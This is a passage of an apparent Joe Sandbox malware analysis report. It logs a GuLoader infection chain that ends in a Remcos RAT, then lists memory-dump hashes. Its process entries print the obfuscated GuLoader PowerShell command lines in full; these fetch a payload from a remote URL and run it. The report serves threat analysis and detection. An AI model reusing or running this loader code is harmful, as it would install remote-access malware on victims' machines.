Un$ThgJeA SmShI HNS g LsFr ');Germiniparous (Levelheadedness '.e$Kmg .l to,ebDiaJalCa:N SSaeVrnMygS eH,n ,eDe B =ka Cl[ yS LyUdsNot.oe ,m .a CWeo PnRavUneKrrBltMa]Ex: U:ViFP r MoFom BKoaUvs ueAs6Ty4 ,SCatinrViiV.nR gFe(Al$ DsRet eo kAme asAriBla a)Be ');Germiniparous (Levelheadedness 'S $ BgRelGiO bDiaAnlAv:U.S TPA kPlK,eE SD.oe P Ma=Sl U[ SSnyUnsReTKoeSkmGl.MatPreN xb TPo. yEAunFeCGiOH,D siFln RGZa] .:O :UnAKaSRecpoiKoIEr.TaGPue .t bSintH rUnIQuN ogSt( $ SReEBrNDigO ePrnUnECe)H ');Germiniparous (Levelheadedness ' B$ aGStLUnO oBHeaMaLRe: AMChuFolReT Fi,ob.ei mrnot .HSu= T$NosRepOnk uK MeSvdDeeQu. AsS Um,bTusSaT TrTeINaNTrG (Re$.okS oH NA tE oGir HanoSDrsCai nS AT SE rNO tJaeFonP SUn1Ek5,a3 ,,Su$SuFAmE jWalS dL,IMasSapTroSmnMaeNoRPiE lSPo)Di ');Germiniparous $Multibirth;"
                                                                Imagebase:0x7ff7be880000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:23:01:57
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:23:02:07
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. 
Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germiniparous (Levelheadedness 'Fr$ .g MlS O uB,aA l : NTaoslr m uaVoL ,tReiBrLmas STSua Rn od EAlnovsS =G ( .tOvEG.S oTWr- PPrua ftT H U po$,eG LA mTiID.NNegMaSBi) U ') ;Germiniparous (Levelheadedness 'Fo$SnG LunoChBAsA QlI : oPSka,rs OTO.e.tl BfBoA R evMyeWaRP nS.eNes.t=U $ Ig Hl Uo.nbPeaWiLAl:Mep ArskoAfPEsh TytrL vAF cIntLoOFodLooyaNA TKoi.iaVe+Ev+ A%Su$AfFDiOS LPiIAroK ljgO ssF ERa1Fl9 T7Li.CacAmoc.uBln LTF, ') ;$Booklores=$Foliolose197[$Pastelfarvernes];}$Kontorassistentens153=302470;$Fejldisponeres=27572;Germiniparous (Levelheadedness 'De$ GSal TOSpB VaMalF :NoSMat DOLaKCoEAgs .I a S y=Mi GagR.EB T S-Dic noH nAuT wE ONTet . 
Un$ThgJeA SmShI HNS g LsFr ');Germiniparous (Levelheadedness '.e$Kmg .l to,ebDiaJalCa:N SSaeVrnMygS eH,n ,eDe B =ka Cl[ yS LyUdsNot.oe ,m .a CWeo PnRavUneKrrBltMa]Ex: U:ViFP r MoFom BKoaUvs ueAs6Ty4 ,SCatinrViiV.nR gFe(Al$ DsRet eo kAme asAriBla a)Be ');Germiniparous (Levelheadedness 'S $ BgRelGiO bDiaAnlAv:U.S TPA kPlK,eE SD.oe P Ma=Sl U[ SSnyUnsReTKoeSkmGl.MatPreN xb TPo. yEAunFeCGiOH,D siFln RGZa] .:O :UnAKaSRecpoiKoIEr.TaGPue .t bSintH rUnIQuN ogSt( $ SReEBrNDigO ePrnUnECe)H ');Germiniparous (Levelheadedness ' B$ aGStLUnO oBHeaMaLRe: AMChuFolReT Fi,ob.ei mrnot .HSu= T$NosRepOnk uK MeSvdDeeQu. AsS Um,bTusSaT TrTeINaNTrG (Re$.okS oH NA tE oGir HanoSDrsCai nS AT SE rNO tJaeFonP SUn1Ek5,a3 ,,Su$SuFAmE jWalS dL,IMasSapTroSmnMaeNoRPiE lSPo)Di ');Germiniparous $Multibirth;"
                                                                Imagebase:0x6c0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2420231333.0000000008AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2420398899.000000000BB20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2405265854.0000000005D5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:23:02:07
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:23:02:30
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                Imagebase:0xd10000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2216529433.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e80000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c21e78c80602b09267e83d560a9ffd12fb1d757bef37bda03d9ba3418c3ba8e
                                                                  • Instruction ID: 47e66991a5e0160f90860668323a68ff6bbd120937c91c62d40b26247d07aba9
                                                                  • Opcode Fuzzy Hash: 1c21e78c80602b09267e83d560a9ffd12fb1d757bef37bda03d9ba3418c3ba8e
                                                                  • Instruction Fuzzy Hash: 0DF1B53090CA8D8FEBA8EF28D8557F937D1FF54350F44426AE84DC7295DB3899858B82
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2216529433.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e80000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59468d66ead1307d74c21e448f42d55ddd7520798d51554be9a62283b36b324b
                                                                  • Instruction ID: 315f1175dc7351fcbb28562814889a19dbdd5b8ab8bd0dc2c64f507e83f32e0f
                                                                  • Opcode Fuzzy Hash: 59468d66ead1307d74c21e448f42d55ddd7520798d51554be9a62283b36b324b
                                                                  • Instruction Fuzzy Hash: 48E1933090CA8E8FEBA8EF28C8557E977D1FF94350F44426AD84DC7295DF7898458B81
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: G
                                                                  • API String ID: 0-985283518
                                                                  • Opcode ID: 878d83710379ca5543fad44ef6d5140b071dc329874d36b9ebcc54967802c031
                                                                  • Instruction ID: 50b3932be5b3ec05cb48da2b94941f596a41dfeb936928b4353a70fffd4846ab
                                                                  • Opcode Fuzzy Hash: 878d83710379ca5543fad44ef6d5140b071dc329874d36b9ebcc54967802c031
                                                                  • Instruction Fuzzy Hash: A4123671E0EAD64FE39AA73C5865274BBE1EF62690F0901FAD449C70E3DE189C068356
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2216529433.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e80000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dc324b55ca82f8ce15b150f25f8bb8f9250c7b20fe20e94bd78ab12d40f66df7
                                                                  • Instruction ID: 552c89d643edbc38d76b1ef6af7fa46908a9c5c53329b3c023cd2436b2e45c7d
                                                                  • Opcode Fuzzy Hash: dc324b55ca82f8ce15b150f25f8bb8f9250c7b20fe20e94bd78ab12d40f66df7
                                                                  • Instruction Fuzzy Hash: 18226D30A1CA4D8FDF98EF58C495AADB7E2FFA8340F544169D40AD7295CB35E881CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: db7bcbb85ea2d846a84eb9a843e701bbf1289e110516feccbf1ec9c09abbbfa0
                                                                  • Instruction ID: 696680ebcc2795571386750605752ffd96c58567c1d9217759c07693f5c1b5f0
                                                                  • Opcode Fuzzy Hash: db7bcbb85ea2d846a84eb9a843e701bbf1289e110516feccbf1ec9c09abbbfa0
                                                                  • Instruction Fuzzy Hash: 84D13631E0DB8A4FE79AEB2868546B4BBE1EF56250F0801FBC04DCB5D3DA199C46C395
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2216529433.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e80000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aac2de51dfbf0c2e755f00d48addaf9fcc84a1b1885c53214c25864535310fdc
                                                                  • Instruction ID: 6117f6cd9dbcb2a5e4dda69f7526ac1c875f49514cfd7eeee972af941f588cc2
                                                                  • Opcode Fuzzy Hash: aac2de51dfbf0c2e755f00d48addaf9fcc84a1b1885c53214c25864535310fdc
                                                                  • Instruction Fuzzy Hash: DFB1B33090CA8D8FEB68EF28C8557E93BD1FF55350F44426EE84DC7292CB74A9458B86
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 74aa3e673249fbdb544faf33f7925bb49186918e9c8591700c2674139f2fb504
                                                                  • Instruction ID: 7d500693fd8ecec1747785570abcf4e55f21e7992d3848564a179231246841a1
                                                                  • Opcode Fuzzy Hash: 74aa3e673249fbdb544faf33f7925bb49186918e9c8591700c2674139f2fb504
                                                                  • Instruction Fuzzy Hash: 41A12431E1DE9A4FEB99AB2C98556B4BBE1FF593A4F0801BAD00DC71D3DE18AC058345
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 035d168615b76b692bf59d3d4825a407563d20a3bc3f9b1008ddc3aa9de37848
                                                                  • Instruction ID: 7b1c11c16d7135ac7d1c66c8c431fe704aa0ca160944d10ad691eeab196d062b
                                                                  • Opcode Fuzzy Hash: 035d168615b76b692bf59d3d4825a407563d20a3bc3f9b1008ddc3aa9de37848
                                                                  • Instruction Fuzzy Hash: CD61F731E0EB894FE756AB6858546A4BBF1EF56350F0901FBD048CB0D3DA185895C396
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a79ba3bf5a84e80c01d6b8b75f85e5686a8f9a45c621f1d2e78da6f5e421e647
                                                                  • Instruction ID: 53b506e3e2050a37e2481ef4409d49980424aadc2b02b67296842950b96e664c
                                                                  • Opcode Fuzzy Hash: a79ba3bf5a84e80c01d6b8b75f85e5686a8f9a45c621f1d2e78da6f5e421e647
                                                                  • Instruction Fuzzy Hash: DA51D331E0DA854FE79AAB2868552A8BBE1FF55750F1801FEC04C871D3DE28AC498746
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 785935361850a3b2b4c168b509c71367876a1a6038e5e498d96f7ef28d21ef88
                                                                  • Instruction ID: d2e1874148bdecab1d29ce59c5879d1c01b643eed2798f5151455a573e38acbf
                                                                  • Opcode Fuzzy Hash: 785935361850a3b2b4c168b509c71367876a1a6038e5e498d96f7ef28d21ef88
                                                                  • Instruction Fuzzy Hash: 77510232E0EA854FE759AB2898552B8BBE1FF55354F1800FEC04C871D3DF29AC898346
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fcf80e1ea114188b505923199ac96d3f89424b132d3e2e0deb3b7e7fba1e4682
                                                                  • Instruction ID: caebc46eb1ed7c90695c39198e15c7dc6abad831de7fb6168b6c834dc8afa521
                                                                  • Opcode Fuzzy Hash: fcf80e1ea114188b505923199ac96d3f89424b132d3e2e0deb3b7e7fba1e4682
                                                                  • Instruction Fuzzy Hash: 3751D431E0EA855FE759AB2858552A8FBE2FF55750F1801FEC04CC71C3DE28AC998786
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 50ca5ac3d78c7f6ba27e6ded85e08e7483b9833ab6a2bb50e608a371ec1fd31d
                                                                  • Instruction ID: 921c831df7773e2cb1379f7593af8bc062cd2c6fb95ef0efe5702d47420ef85b
                                                                  • Opcode Fuzzy Hash: 50ca5ac3d78c7f6ba27e6ded85e08e7483b9833ab6a2bb50e608a371ec1fd31d
                                                                  • Instruction Fuzzy Hash: 04313131D1EE975FF3A9A7286821178EAE1FF097E4F5801BAD01DD31D3EE087814425A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e18e33417923188c47593965eec0163ab28a90a0eabb2b94be7d11cd10964d47
                                                                  • Instruction ID: 36e107be095f75e5cf2f1f030e1182a9d1bf831cd11af23967b0ca4a965c4371
                                                                  • Opcode Fuzzy Hash: e18e33417923188c47593965eec0163ab28a90a0eabb2b94be7d11cd10964d47
                                                                  • Instruction Fuzzy Hash: D6213571E1EEAA4FF3AAB72C1445174A6D2FFA13A0F5800BAD00DC71D7DE18AC054209
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2216529433.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e80000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8ed26f0bcf38b8b7632d8c3059faaa66affeaef89ae960392350c48cc8d4ddee
                                                                  • Instruction ID: a825374373f82b35d70e52953b278f4d0d464d82fa449778edc79c3a4c64368d
                                                                  • Opcode Fuzzy Hash: 8ed26f0bcf38b8b7632d8c3059faaa66affeaef89ae960392350c48cc8d4ddee
                                                                  • Instruction Fuzzy Hash: CE31063081D64EAFFBB8AF58CC1ABF93291FF41359F800139D40D86092DB796985DB16
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 373f5539fb57263451b1bba0b379ffb70afe54f11f0256d347315f34982d53fc
                                                                  • Instruction ID: 3b644a14d6b6923d407ae863483be925f492f4dc74f564695c5ca2653890b147
                                                                  • Opcode Fuzzy Hash: 373f5539fb57263451b1bba0b379ffb70afe54f11f0256d347315f34982d53fc
                                                                  • Instruction Fuzzy Hash: 9D212B21E0EAC65FF395A73C2815074AAD0EF566D4F0901FAD04AC70D3DE2C5C89432A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75c1ca0f8eebeb011e91981603fca41443689a98ca3e9c00cbffefaa681d25fc
                                                                  • Instruction ID: 876dab2109be506ba1effb6cde64b1018ef4a9c0849258f7427311e59ed5e28e
                                                                  • Opcode Fuzzy Hash: 75c1ca0f8eebeb011e91981603fca41443689a98ca3e9c00cbffefaa681d25fc
                                                                  • Instruction Fuzzy Hash: 99012631E0EA869FEB9AE73C6851974B7E1EF16740B0805FAC00DCB1D7D908AC448395
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2216529433.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848e80000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction ID: 5f6525b4c40e49a8b224777401edeb9743f650b26be48d5259be4b959626fbe0
                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction Fuzzy Hash: EF01677111CB0C4FDB48EF0CE451AAAB7E0FB95364F50056DE58AC3651DB36E881CB45
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ec56a705165b94bb960bfac0d3828cecbc974841498766da96083052ce1ca85a
                                                                  • Instruction ID: e982056beb33a52dc605d568e7a9ee62d938fb10e3382ab7c50eaf06b1151587
                                                                  • Opcode Fuzzy Hash: ec56a705165b94bb960bfac0d3828cecbc974841498766da96083052ce1ca85a
                                                                  • Instruction Fuzzy Hash: 45F0ED32A0CD0C0EE389A22C680A1F9B3D2EFC8136F590277C10EC3186EE21D80B8248
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2218129933.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ff848f50000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1e28d8d998f8773f4ea3c9bf34a5f0596705f5d63c0398acb172111be7409aad
                                                                  • Instruction ID: b89bbe1f439ea85a9d57733bedfdfe87b0fd197152f297ca9a4afb216994bf01
                                                                  • Opcode Fuzzy Hash: 1e28d8d998f8773f4ea3c9bf34a5f0596705f5d63c0398acb172111be7409aad
                                                                  • Instruction Fuzzy Hash: CBE0D832F1DE554DFB49661C78020F8B3E1DF81170B48147FD10EC3083DA16A8160249
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8f90927b7b38fac0e42b867d01e6099897c652d89b1900759557b0f3a9560a99
                                                                  • Instruction ID: ed7b3c5e08df0ee5d73a03dc20ecb21f2edeb9f5278186f45660a4d4eba83074
                                                                  • Opcode Fuzzy Hash: 8f90927b7b38fac0e42b867d01e6099897c652d89b1900759557b0f3a9560a99
                                                                  • Instruction Fuzzy Hash: EBB16F70E00609DFDF14CFA9C9857DEBBF2BF88315F148529D816AB254EB74A842CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fc034983f0573597ff3d2415ffb692a6c7ef755b5a4c0455234c007a453782c8
                                                                  • Instruction ID: f89114af002e496adde956f38ae629e4512cc5cc4b9d12e7695c8a756718a7ca
                                                                  • Opcode Fuzzy Hash: fc034983f0573597ff3d2415ffb692a6c7ef755b5a4c0455234c007a453782c8
                                                                  • Instruction Fuzzy Hash: 61B13E70E00209DFDF10CFA9D9857DEBBF2AF88714F148529E816AB254EB74A845CB85
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d3f17ef17a2e7ae54a8bfd31ef70958af6565ab93b5386e7be0b048ca62dc7e
